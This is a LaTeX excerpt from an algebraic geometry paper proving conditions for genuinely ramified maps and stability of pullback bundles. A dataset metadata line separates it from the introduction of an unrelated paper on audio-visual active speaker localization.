\nonumber\\
& \, = \, & ((p_1)_*\mathcal{O}_{X\times_Y X})/((p_1)_*\mathcal{O}_{X\times_Y X})_{\rm tor}.
\label{tq}
\end{eqnarray}
To explain the last equality in \eqref{tq}, note the following:
\begin{itemize}
\item If $\mathcal V$ is a torsionfree sheaf on $X\times_Y X$, then
$(p_1)_*\mathcal V$ is a torsionfree sheaf on $X$.
\item If $\mathcal V$ is a torsion sheaf on $X\times_Y X$, then
$(p_1)_*\mathcal V$ is a torsion sheaf on $X$.
\end{itemize}
Hence \eqref{tq} holds.
In view of \eqref{tq}, invoking the isomorphism in \eqref{e6} it is concluded that
$$
(p'_{1})_* {\mathcal O}_{\mathcal Z}\, = \, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}\, .
$$
This implies that
\begin{equation}\label{eq_torsion_reduced}
H^0(X,\, (p'_{1})_* {\mathcal O}_{\mathcal Z})\,=\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)
\,=\, H^0(X,\, (p'_{2})_* {\mathcal O}_{\mathcal Z})
\end{equation}
(the notation in \eqref{en} is used).
\begin{theorem}\label{thm1}
As in \eqref{e1}, let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable surjective
map between irreducible normal projective varieties. Then the following five statements
are equivalent.
\begin{enumerate}
\item The map $f$ is genuinely ramified.
\item There is no nontrivial \'etale covering $g\, :\, Y'\,\longrightarrow\, Y$ satisfying the condition
that there is a map $g'\, :\, X\,\longrightarrow\, Y'$ for which $g\circ g'\,=\, f$.
\item The fiber product $X\times_Y X$ is connected.
\item $\dim H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\,=\, 1$ (see \eqref{e4}).
\item The subsheaf ${\mathbb S}\, \subset\, f_*{\mathcal O}_X$ in \eqref{e3} coincides with the subsheaf
${\mathcal O}_Y$ in \eqref{e0};
in other words, the inclusion in \eqref{t1} is an equality. This is equivalent to the condition that
${\rm rank}({\mathbb S})\,=\, 1$.
\end{enumerate}
\end{theorem}
\begin{proof}
We will show that $(1) \Leftrightarrow (2)$, $(1) \Leftrightarrow (5)$, $(3) \Leftrightarrow (4)$, $(3) \Rightarrow
(2)$ and $(5) \Rightarrow (4)$.
Let
$$f_*\, :\, \pi_1^{\rm et}(X)\,\longrightarrow\, \pi_1^{\rm et}(Y)$$
be the homomorphism between the \'etale fundamental groups induced by the map $f$.
Since the map $f$ is dominant, $f_*(\pi_1^{\rm et}(X))$ is a subgroup of
$\pi_1^{\rm et}(Y)$ of finite index. In fact, the index of this
subgroup is at most $\text{degree}(f)$. Let
$$
g\, :\, Y'\,\longrightarrow\, Y
$$ be the \'etale covering for this subgroup $f_*(\pi_1^{\rm et}(X))\, \subset\,
\pi_1^{\rm et}(Y)$. Then there is a morphism
$g'\, :\, X\,\longrightarrow\, Y'$ such that $g\circ g'\,=\, f$. To explain this map $g'$, fix a point
$y_0\, \in\, Y$ and also fix points $x_0\, \in\, X$ and $y_1\, \in\, Y'$ over $y_0$. Let $X'$
be the connected component of the fiber product $X\times_Y Y'$ containing the point $(x_0,\, y_1)$. The
given condition that $f_*(\pi_1^{\rm et}(X,\, x_0))\,=\, g_*(\pi_1^{\rm et}(Y',\, y_1))$ implies that the
\'etale covering $f'\, :\, X'\, \longrightarrow\, X$, where $f'$ is
the natural projection, induces an isomorphism of \'etale fundamental groups.
Hence $f'$ is actually an isomorphism. If $g'$ is the composition of maps $$X\, \stackrel{\sim}{\longrightarrow}\, X'
\, \longrightarrow\, Y'\, ,$$ where $X'\, \longrightarrow\, Y'$ is the natural projection, then
clearly, $g\circ g'\,=\, f$.
Therefore, the statement (2) implies the statement (1). Conversely, if there is a nontrivial \'etale covering
$g\, :\, Y'\,\longrightarrow\, Y$ and a morphism $g'\, :\, X\,\longrightarrow\, Y'$ such that
$g\circ g'\,=\, f$, then the homomorphism $f_*$ is not surjective, because the homomorphism $g_*$ is
not surjective. So the statements (1) and (2) are equivalent.
It is known that the statements (1) and (5) are equivalent; see \cite[Proposition 1.3]{BP2}.
We will now prove that the statements (3) and (4) are equivalent.
The fiber product $X\times_Y X$ is connected if and only if $\dim H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})
\,=\,1$, where $\mathcal Z$ is constructed in \eqref{cz}. Therefore, $X\times_Y X$ is connected if and only if
$$\dim H^0(X,\, (p'_{1})_* {\mathcal O}_{\mathcal Z})\,=\, 1,$$ where $p'_1$ is the map in
\eqref{pi}. Consequently, from \eqref{eq_torsion_reduced} it follows
immediately that the statements (3) and (4) are equivalent.
Next we will show that the statement (3) implies the statement (2).
Assume that (2) does not hold. So there is a nontrivial \'etale covering
$$g\, :\, Y'\,\longrightarrow\, Y$$ and a map
$g'\, :\, X\,\longrightarrow\, Y'$ such that $g\circ g'\,=\, f$. Since $g$ is \'etale, the fiber product
$Y'\times_Y Y'$ is a reduced normal projective scheme. However, $Y'\times_Y Y'$ is not connected. In fact,
the image of the diagonal embedding $Y'\, \hookrightarrow\, Y'\times_Y Y'$ is a connected component of
$Y'\times_Y Y'$. Note that this diagonal embedding is not surjective because $g$ is
nontrivial. Since the map
$$
(g',\, g')\, :\, X\times_Y X\,\longrightarrow\, Y'\times_Y Y'
$$
is surjective, and $Y'\times_Y Y'$ is not connected, we conclude that $X\times_Y X$ is
not connected. Hence the statement (3) implies the statement (2).
Finally, we will prove that the statement (5) implies the statement (4).
Assume that the statement (4) does not hold. So from \eqref{e4b} it follows that
\begin{equation}\label{em}
n\, :=\, \dim H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\,\geq \, 2\, .
\end{equation}
Choose a finite Galois field extension $k(Y)\,\subset\, k(X)\,\subset\,L$. Let $$\Gamma \, = \, \text{Gal}(L/k(Y))$$
be the corresponding Galois group. Let $M$ be the normalization of $X$ in $L$. So $M$ is an irreducible normal projective
variety with $k(M)\,=\,L$, and
$$
\widehat{f} \, \,\colon\,\, M \, \longrightarrow \, Y
$$
is a Galois (possibly branched) cover dominating the map $f$;
the Galois group for $\widehat{f}$ is $\text{Gal}(L/k(Y))\,=\, \Gamma$. Let
\begin{equation}\label{eg}
g \,\, \colon \,\, M \, \longrightarrow \, X
\end{equation}
be the morphism induced by the inclusion map $k(X)\,\hookrightarrow\,L$, so $f\circ g\,=\, \widehat{f}$.
Let
\begin{equation}\label{g1}
\varphi\, :\, {\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)\, \longrightarrow\,
(f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}
\end{equation}
be the evaluation homomorphism. We will show that this homomorphism $\varphi$ of coherent sheaves
is injective. To prove this, first note that for a semistable sheaf $V$ on $Y$,
the pullback $(f^*V)/(f^*V)_{\rm tor}$ is semistable (see \cite[Remark 2.1]{BP1}; the proof in
\cite[Remark 2.1]{BP1} works for all dimensions). Therefore, from \eqref{e2} we conclude that
\begin{equation}\label{g2}
\mu_{\rm max}((f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor})\, =\, 0\, .
\end{equation}
Any coherent subsheaf ${\mathcal W}\, \subset\, {\mathcal O}_X\otimes H^0_{\mathbb F}
(X,\, f^*f_*{\mathcal O}_X)$
such that
\begin{enumerate}
\item $\text{degree}({\mathcal W})\,=\, 0$, and
\item the quotient $({\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X))/{\mathcal W}$ is torsionfree
\end{enumerate}
must be of the form $${\mathcal O}_X\otimes W\, \subset\,{\mathcal O}_X\otimes H^0_{\mathbb F}(X,\,
f^*f_*{\mathcal O}_X)$$
for some subspace $$W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X).$$ Indeed, this follows from the
fact that $\text{degree}({\mathcal W})$ is a nonzero multiple of the degree of the pullback of the tautological bundle
by the rational map from $X$ to the Grassmannian corresponding to ${\mathcal W}$; if ${\rm rank}({\mathcal W})\,=\, a$, then
${\mathcal W}$ is given by a rational map from $X$ to the Grassmannian parametrizing $a$ dimensional subspaces of $k^{\oplus n}$ (this map is defined on the open subset over which $\mathcal W$ is a subbundle of ${\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$). Therefore, from the given two conditions on ${\mathcal W}$ it follows that it is of the form ${\mathcal O}_X\otimes W$ for some subspace
$W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$. For the homomorphism $\varphi$ in
\eqref{g1} if ${\rm kernel}(\varphi)\, \not=\, 0$, then $\text{degree}({\rm kernel}(\varphi))\,=\, 0$; this follows from \eqref{g2} and the fact that ${\rm degree}({\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)) \,=\,0$ (these two together imply that the image of $\varphi$ lies in the
maximal semistable subsheaf of $(f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}$).
Also, the quotient $({\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X))/{\rm kernel}(\varphi)$ is torsionfree, because it is contained in $(f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}$. Therefore, from the earlier observation we conclude that ${\rm kernel}(\varphi)$
is of the form ${\mathcal O}_X\otimes W\, \subset\,{\mathcal O}_X\otimes H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$ for some subspace $W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$. From this it follows that the evaluation map on any $w\, \in\, W\, \subset\, H^0_{\mathbb F}(X,\, f^*f_*{\mathcal O}_X)$ is identically zero. But this implies that $w\,=\, 0$. Therefore, we conclude that
$W\,=\, 0$, and the homomorphism $\varphi$ in \eqref{g1} is injective.
Let
\begin{equation}\label{es}
{\mathcal S}\,:=\, {\rm image}(\varphi)\, \subset\, (f^*f_*{\mathcal O}_X)/(f^*f_*{\mathcal O}_X)_{\rm tor}
\end{equation}
be the image of $\varphi$. Since $\varphi$ is injective, we conclude that
${\mathcal S}$ is isomorphic to ${\mathcal O}^{\oplus n}_X$ (see \eqref{em}). The pullback $g^*{\mathcal S}$
by the map $g$ in \eqref{eg} is free (equivalently, it is a trivial bundle)
because ${\mathcal S}$ is so. The pulled back homomorphism
$$
g^*\varphi\, :\, g^*{\mathcal S}\, \longrightarrow\,
(g^*f^*f_*{\mathcal O}_X)/(g^*f^*f_*{\mathcal O}_X)_{\rm tor}\,=\,
(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}
$$
is injective because $\varphi$ is injective and $\mathcal S$ is free (or
the bundle is trivial). Using $g^*\varphi$ we would consider $g^*{\mathcal S}$
as a subsheaf of $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$.
The Galois group $\Gamma\,=\, {\rm Gal}(\widehat{f})$ has a natural action on $\widehat{f}^*f_*{\mathcal O}_X$
because this sheaf is pulled back from $Y$. This action of $\Gamma$ on
$\widehat{f}^*f_*{\mathcal O}_X$ produces an action of $\Gamma$ on the torsionfree quotient
$(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$.
Consider ${\mathcal Z}$ defined in \eqref{cz} together with the projections $p'_1$ and $p'_2$ from it in
\eqref{pi}. Both $(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ are free because $\mathcal S$
is so. The natural isomorphism
$$
(p'_1)^*f^*f_*{\mathcal O}_X \, \stackrel{\sim}{\longrightarrow}\, (p'_2)^*f^*f_*{\mathcal O}_X,
$$
given by the fact that they are the pull backs of a single sheaf on $Y$, produces an isomorphism
\begin{equation}\label{it2}
((p'_1)^*f^*f_*{\mathcal O}_X)/((p'_1)^*f^*f_*{\mathcal O}_X)_{\rm tor} \, \stackrel{\sim}{\longrightarrow}\,
((p'_2)^*f^*f_*{\mathcal O}_X)/((p'_2)^*f^*f_*{\mathcal O}_X)_{\rm tor}\,.
\end{equation}
It can be shown that the isomorphism in \eqref{it2} takes the subsheaf
$$
(p'_1)^*{\mathcal S}\,\subset\, ((p'_1)^*f^*f_*
{\mathcal O}_X)/((p'_1)^*f^*f_*{\mathcal O}_X)_{\rm tor},
$$
where $\mathcal S$ is defined in \eqref{es}, to the subsheaf
$$
(p'_2)^*{\mathcal S}\, \subset\,((p'_2)^*f^*f_*{\mathcal O}_X)/((p'_2)^*f^*f_*{\mathcal O}_X)_{\rm tor}.
$$
Indeed, we have
$$
H^0(X,\, (p'_{1})_* {\mathcal O}_{\mathcal Z})\,=\, H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})\,=\,
H^0(X,\, (p'_{2})_* {\mathcal O}_{\mathcal Z})
$$
(because $p'_1$ and $p'_2$ are finite maps), and therefore from \eqref{eq_torsion_reduced} it follows that both
$(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ coincide with
${\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$.
The isomorphism in \eqref{it2} takes the subsheaf $(p'_1)^*{\mathcal S}$ to $(p'_2)^*{\mathcal S}$,
and the homomorphism $(p'_1)^*{\mathcal S}\,{\longrightarrow}\,(p'_2)^*{\mathcal S}$ given by the
isomorphism in \eqref{it2} coincides with the following automorphism of ${\mathcal O}_{\mathcal Z}
\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$ (after we
identify $(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ with
${\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$): The involution
$(x,\, y)\, \longmapsto\, (y,\, x)$
of $X\times_Y X$ produces an involution of ${\mathcal Z}\, =\, (X\times_Y X)_{\rm red}$. This
involution of ${\mathcal Z}$ in turn produces an involution
$$
\delta\, :\, H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z}) \,{\longrightarrow}\,
H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})\, .
$$
Define the automorphism
$$
{\rm Id}\otimes\delta\, :\, {\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})
\, \longrightarrow\, {\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})\, .
$$
The homomorphism $(p'_1)^*{\mathcal S}\,{\longrightarrow}\,(p'_2)^*{\mathcal S}$ given by the
isomorphism in \eqref{it2} coincides with the automorphism ${\rm Id}\otimes\delta$ of ${\mathcal O}_{\mathcal Z}
\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$, after we
identify $(p'_1)^*{\mathcal S}$ and $(p'_2)^*{\mathcal S}$ with
${\mathcal O}_{\mathcal Z}\otimes H^0({\mathcal Z},\, {\mathcal O}_{\mathcal Z})$.
Using the above observation that the isomorphism in \eqref{it2} takes the subsheaf $(p'_1)^*{\mathcal S}$
to $(p'_2)^*{\mathcal S}$ we will now show that the natural action
of the Galois group $\Gamma\,=\, {\rm Gal}(\widehat{f})$ on $(\widehat{f}^*f_*{\mathcal O}_X)/
(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ preserves the subsheaf $g^*{\mathcal S}$, where $g$
is the map in \eqref{eg}; it was noted earlier
that $\Gamma$ acts on $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$.
To prove that the action of $\Gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)/
(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ preserves $g^*{\mathcal S}$, let $Y_0\, \subset\,
Y$ be the largest open subset such that
\begin{itemize}
\item the map $f$ is flat over $Y_0$, and
\item the map $g$ is flat over $f^{-1}(Y_0)$.
\end{itemize}
Define $X_0\, :=\, f^{-1}(Y_0)$ and $M_0\,:=\, \widehat{f}^{-1}(X_0)$. The conditions on $Y_0$
imply that the restriction of $\widehat f$ to
$M_0$ is flat \cite[Ch~III, \S~9]{Ha}. In view of the descent criterion for sheaves under flat
morphisms, \cite{Gr}, \cite{Vi},
the above observation, that the isomorphism in \eqref{it2} takes the subsheaf
$(p'_1)^*{\mathcal S}$ to the subsheaf $(p'_2)^*{\mathcal S}$, implies that the restriction
${\mathcal S}\big\vert_{X_0}$ descends to a subsheaf of $(f_*{\mathcal O}_X)\big\vert_{Y_0}$.
Consequently, the action of $\Gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)\big\vert_{M_0}$ preserves
$(g^*{\mathcal S})\big\vert_{M_0}$ (as it is the pullback of a
sheaf on $Y_0$); note that $\widehat{f}^*f_*{\mathcal O}_X$ is torsionfree over $M_0$ because
the map $\widehat f$ is flat over $M_0$. The codimension of the complement $M\setminus M_0$ is at least
two. Therefore, given two vector bundle $A$ and $B$ on $M$ together with an isomorphism
$${\mathcal I}\, :\, A\big\vert_{M_0} \, \stackrel{\sim}{\longrightarrow}\, B\big\vert_{M_0}$$ over $M_0$, there
is a unique isomorphism
$$\widetilde{\mathcal I}\, :\, A \, \stackrel{\sim}{\longrightarrow}\, B$$
that restricts to ${\mathcal I}$ on $M_0$; recall that $M$ is normal. For any $\gamma\, \in\, \Gamma$,
set $g^*{\mathcal S}\,=\, A\,=\, B$ and ${\mathcal I}$ to be the action of $\gamma$ on
$(g^*{\mathcal S})\big\vert_{M_0}$; recall that $g^*{\mathcal S}$ is locally free and
the action of $\Gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)\big\vert_{M_0}$ preserves
$(g^*{\mathcal S})\big\vert_{M_0}$. Now from the above observation that $\mathcal I$ extends uniquely
to $M$ we conclude that the action of $\gamma$ on $(\widehat{f}^*f_*{\mathcal O}_X)
/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ preserves the subsheaf $g^*{\mathcal S}$.
{}From the above observation that $g^*{\mathcal S}$ is preserved by the natural action of $\Gamma$ on
$(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$ we will now
deduce that there is a locally free subsheaf
$$
V\, \subset\, f_*{\mathcal O}_X
$$
such that the image of $\widehat{f}^*V$ in $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm
tor}$ coincides with the image of $g^*{\mathcal S}$ in $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal
O}_X)_{\rm tor}$.
To prove this, consider the free sheaf
$$
{\mathcal O}_M\otimes H^0(M,\, g^*{\mathcal S})\, \longrightarrow\, M\, ;
$$
it corresponds to the trivial vector bundle on $M$ with fiber $H^0(M,\, g^*{\mathcal S})$. Let
\begin{equation}\label{ei}
\Phi\, :\, {\mathcal O}_M\otimes H^0(M,\, g^*{\mathcal S})\, \longrightarrow\, g^*{\mathcal S}
\end{equation}
be the evaluation map. This $\Phi$ is an isomorphism, because $g^*{\mathcal S}$ is free, or equivalently,
it is a trivial vector bundle (recall that ${\mathcal S}$ is free).
The action of $\Gamma$ on $g^*{\mathcal S}$ produces an action of $\Gamma$ on $H^0(M,\,
g^*{\mathcal S})$ which, coupled with the action of $\Gamma$ on $M$, produces an action of $\Gamma$ on
${\mathcal O}_M\otimes H^0(M,\, g^*{\mathcal S})$. The isomorphism $\Phi$
in \eqref{ei} is evidently $\Gamma$--equivariant for the actions of $\Gamma$.
Let
\begin{equation}\label{ga0}
\Gamma_0\, \subset\, \Gamma
\end{equation}
be the normal subgroup that acts trivially on the vector space $H^0(M,\, g^*{\mathcal S})$. Now using
$\Phi$ we conclude that $g^*{\mathcal S}$ descends to a vector bundle on the quotient $M/\Gamma_0$. Let
\begin{equation}\label{ga1}
{\mathcal S}_1\, \longrightarrow\, M/\Gamma_0
\end{equation}
be the descent of $g^*{\mathcal S}$. In other words, the pullback of ${\mathcal S}_1$ to $M$ has a
$\Gamma_0$--equivariant isomorphism with $g^*{\mathcal S}$. Note that ${\mathcal O}_M\otimes H^0(M,\,
g^*{\mathcal S})$ descends to ${\mathcal O}_{M/\Gamma_0}\otimes H^0(M,\, g^*{\mathcal S})$ on $M/\Gamma_0$,
because $\Gamma_0$ acts trivially on $H^0(M,\, g^*{\mathcal S})$, and
hence ${\mathcal S}_1$ is a trivial vector bundle.
For the action of $\Gamma$ on $M$, the isotropy subgroup $\Gamma_m\, \subset\, \Gamma$ any point $m\,\in\, M$
is actually contained in the subgroup $\Gamma_0$ in \eqref{ga0}. Indeed, this follows immediately from the fact that
$\Gamma_m$ acts trivially on the fiber of $(\widehat{f}^*f_*{\mathcal O}_X)/(\widehat{f}^*f_*{\mathcal O}_X)_{\rm tor}$
over $m$; recall that $\mathcal S$ is the image of the injective map $\varphi$ from a trivial vector bundle
(see \eqref{g1} and \eqref{es}). Consequently, the natural map
$$
M/\Gamma_0\, \longrightarrow\, Y
$$
given by $\widehat{f}$ is actually \'etale Galois with Galois group $\Gamma/\Gamma_0$. The
action of $\Gamma$ on $g^*{\mathcal S}$ produces an action of $\Gamma/\Gamma_0$ on ${\mathcal S}_1$ in \eqref{ga1};
it is a lift of the action of $\Gamma/\Gamma_0$ on $M/\Gamma_0$. Hence ${\mathcal S}_1$ descends to
a vector bundle ${\mathcal S}_2$ on $Y$.
We have ${\mathcal S}_2\, \subset\, {\mathbb S}$, where ${\mathbb S}$ is constructed in \eqref{e3}, and
also $${\rm rank}({\mathcal S}_2)\,=\, {\rm rank}({\mathcal S})\,=\, n\, \geq\, 2$$ (see \eqref{em}).
Hence the statement (5) in the theorem fails. Therefore,
the statement (5) implies the statement (4). This completes the proof.
\end{proof}
\begin{theorem}\label{thm2}
Let $f\, :\, X\, \longrightarrow\, Y$ be a finite separable surjective map between irreducible normal
projective varieties such that $f$ is genuinely ramified. Let $E$ be a stable vector bundle on
$Y$. Then the pulled back vector bundle $f^*E$ is also stable.
\end{theorem}
\begin{proof}
In view of Theorem \ref{thm1}, the proof is exactly identical to the proof of Theorem 1.1
of \cite{BP1}. The only point to note that in Proposition 3.5 of \cite{BP1}, the sheaves
${\mathcal L}_i$ are no longer locally free. Now they are sheaves properly contained in
${\mathcal O}_X$. But this does not affect the arguments. We omit the details.
\end{proof}
\section{A characterization of stable pullbacks}
\begin{lemma}\label{lem3}
Let $f\, \colon \, X\, \longrightarrow\, Y$ be a separable finite surjective map
of irreducible normal
projective varieties. Let $E$ be a semistable vector bundle on $X$. Then
$$
\mu_{\rm max}(f_*E)\, \leq\, \frac{1}{{\rm degree}(f)}\cdot\mu(E)\, .
$$
\end{lemma}
\begin{proof}
Let $F\, \subset\, f_*E$ be the first nonzero term of the Harder-Narasimhan filtration of $f_*E$,
so $$\mu_1\, :=\, \mu_{\rm max}(f_*E)\,=\, \mu(F).$$ Therefore,
$(f^*F)/(f^*F)_{\rm tor}$ is semistable \cite[Remark 2.1]{BP1}, and
$$
\mu((f^*F)/(f^*F)_{\rm tor})\,=\, {\rm degree}(f)\cdot\mu_1\,.
$$
The inclusion map $F\, \hookrightarrow\, f_*E$ gives a homomorphism $f^*F\, \longrightarrow\, E$
(see \eqref{eq_adjoint}), which in turn produces a homomorphism
$$
\beta\, :\, (f^*F)/(f^*F)_{\rm tor}\, \longrightarrow\, E.
$$
Since $\beta\, \not=\, 0$, and both $E$ and $(f^*F)/(f^*F)_{\rm tor}$ are
semistable, we have
$$
\mu(E)\, \geq\, \mu({\rm image}(\beta))
\, \geq\, \mu((f^*F)/(f^*F)_{\rm tor})\,=\, {\rm degree}(f)\cdot\mu_1.
$$
This proves the lemma.
\end{proof}
\begin{theorem}\label{thm3}
Let $f\, \colon \, X\, \longrightarrow\, Y$ be a genuinely ramified map of irreducible normal
projective varieties. Let $E$ be a stable vector bundle on $X$. Then there is a vector
bundle $W$ on $Y$ with
$f^*W$ isomorphic to $E$ if and only if $f_*E$ contains a stable vector bundle $F$ such that
$$
\mu(F)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)\,.
$$
\end{theorem}
\begin{proof}
First assume that there is a vector bundle $W$ on $Y$ such that $f^*W$ is isomorphic to $E$.
It can be shown that $W$ is stable. Indeed, if
$$
S\, \subset\, W
$$
is a nonzero coherent subsheaf such that ${\rm rank}(W/S)\, >\, 0$
and $\mu(S)\, \geq\, \mu(W)$, then we have ${\rm rank}((f^*W)/(f^*S))\, >\, 0$
and $$\mu(f^*S)\,=\, \mu(S)\cdot {\rm degree}(f)\, \geq\, \mu(W)\cdot {\rm degree}(f)
\,=\, \mu(f^*W),$$
which contradicts the stability condition for $f^*W\,=\, E$.
Using the given condition $f^*W\,=\, E$, and the projection formula, we have
$$f_*E\,=\, f_*f^* W \,=\, W\otimes f_*{\mathcal O}_X.$$ Since ${\mathcal O}_Y\, \subset\,
f_*{\mathcal O}_X$ (see \eqref{e0}), we have
$$
W\, \subset\, W\otimes f_*{\mathcal O}_X\,=\, f_*E\, .
$$
Note that
$$
\mu(W)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)\,.
$$
To prove the converse, assume that $f_*E$ contains a stable vector bundle $F$ such that
$$
\mu(F)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)\,.
$$
Then $f^*F$ is stable by Theorem \ref{thm2}.
Let
$$
h\,:\, f^*F\, \longrightarrow\, E
$$
be the natural homomorphism; this $h$ is given by the inclusion map $F\, \hookrightarrow\, f_*E$
using the isomorphism in \eqref{eq_adjoint}. Since
\begin{enumerate}
\item both $f^*F$ and $E$ are stable,
\item $\mu(E)\,=\, {\rm degree}(f)\cdot \mu(F)\,=\, \mu(f^*F)$, and
\item $h\, \not=\, 0$,
\end{enumerate}
we conclude that $h$ is an isomorphism.
\end{proof}
\begin{remark}
Note that the proof of Theorem \ref{thm3} shows the following. Let $f\, \colon \, X\,
\longrightarrow\, Y$ be a finite surjective map of irreducible normal projective
varieties. Let $E$ be a stable vector bundle on $X$. If there is a vector bundle bundle
$W$ on $Y$ with $f^*W$ isomorphic to $E$, then $f_*E$ contains a stable vector bundle
$F$ such that $\mu(F)\,=\, \frac{1}{{\rm degree}(f)}\cdot \mu(E)$.
\end{remark}
| 2024-02-18T23:40:18.606Z | 2022-03-08T02:38:04.000Z | algebraic_stack_train_0000 | 2,017 | 5,940 |
|
proofpile-arXiv_065-9874 | \section{Introduction}
As the human brain explores the world, it localizes objects in the environment integrating multi-modal signals into a common reference frame. Visual and auditory cues play a key role in formation of a coherent localization.
Thus, we have learned to localize audio sources, with a certain accuracy, thanks to subtle differences in the acoustic signals picked up by our auditory system, and to integrate them into our perceived model of the world.
Our ability to integrate audio and visual cues as a single percept in a common reference frame improves reliability and robustness, maintaining viable estimates when a modality is corrupted or unavailable.
Audio-visual systems for speaker detection and localization arise in applications such as speaker diarization, surveillance, camera steering and live media production.
In practice, camera and microphone sensors present different yet complementary features, e.g.: their size, cost, power consumption, field of view, temporal and spatial resolutions, robustness to changes in light and occlusions.
A good audio-visual system must be designed to take full advantage of these complementary features but also to rely on a single modality when its counterpart is missing.
This work investigates whether these systems can benefit from joint audio-visual training to gain performance when the visual input fails.
Annotating the ground truth speaker position, as is required for supervised machine learning, is expensive and time-consuming. In contrast, our semi-supervised approach uses manually-screened, automatic audio-visual `pseudo labels' to supervise the training of an audio-only network to detect and locate an active speaker.
Thus, we seek to leverage unlabeled audio-visual training data to learn how to localize an active speaker in the visual reference frame, purely from multi-channel audio signals.
The following sections present the background (\ref{bg}), the proposed approach (\ref{appr}), the experiments (\ref{exp}), the results achieved (\ref{res}), and our conclusions (\ref{concl}).
\section{Background} \label{bg}
\subsection{Self-Supervised Audio-Visual Learning}
Self-supervised audio-visual learning is a research area that is rapidly gaining interest. It provides not only multi-modal solutions to tackle traditional problems, e.g., exploiting
visual information for speech enhancement and separation \cite{Afouras18} or solving the `cocktail party' problem \cite{Ephrat:2018:Looking2Listen}, but
it has also given rise to new tasks: e.g., \cite{morgadoNIPS18} and \cite{Gao:2019:visualsound}
proposed self-supervised approaches to generate spatial audio from videos with monaural sound.
Other works exploited the co-occurrence of audio and visual events to localize and separate audio sources that were seen in the video \cite{gao2018objectSounds,Gao:2019:coseparating,zhao:2018:ECCV}.
However, these approaches require both modalities present, which fail with poor lighting or visual occlusion.
In contrast, our method requires the visual modality only during training,
drawing on the student-teacher paradigm \cite{Hinton2015DistillingTheKnowledge,Aytar:2016:soundNet,Owens2016AmbientSP}.
In audio-visual learning, this paradigm exploits the natural synchronization of audio and visual signals as a bridge between modalities, enabling one modality to supervise another \cite{Owens2016AmbientSP,Aytar:2016:soundNet,Arandjelovic:2017:look}.
Closest to our work, \cite{Gan2019SelfSupervisedMV,valverde:2021:mmdistillnet,vasudevan:2020:semanticobject} adopted a student-teacher approach to detect vehicles in the visual domain using audio input.
Their models were trained with pseudo-labels obtained via pre-trained visual networks:
Gan \textit{et al.} \cite{Gan2019SelfSupervisedMV} and Rivera Valverde \textit{et al.} \cite{valverde:2021:mmdistillnet} used respectively a stereo microphone and a microphone array to estimate 2D bounding boxes, while Vasudevan \textit{et al.} \cite{vasudevan:2020:semanticobject} used binaural sound for semantic segmentation of 360° street views.
In contrast, we use a 16-channel microphone array and deal with human speakers, not cars.
Unlike continuous car noise, speech is challenging as detected faces may be actively speaking or silent.
Thus, active speaker localization combines activity detection with source localization which is a problem of major interest especially to the audio community, see for instance the Task3 of the DCASE challenge \cite{politis:2020:DCASE}.
According to Yann LeCun's definition \cite{LeCun:2019:tweet},
we use \textit{self-supervised learning} in that part of the input (visual frames \& mono audio) supervises a network fed the remainder (multi-channel audio).
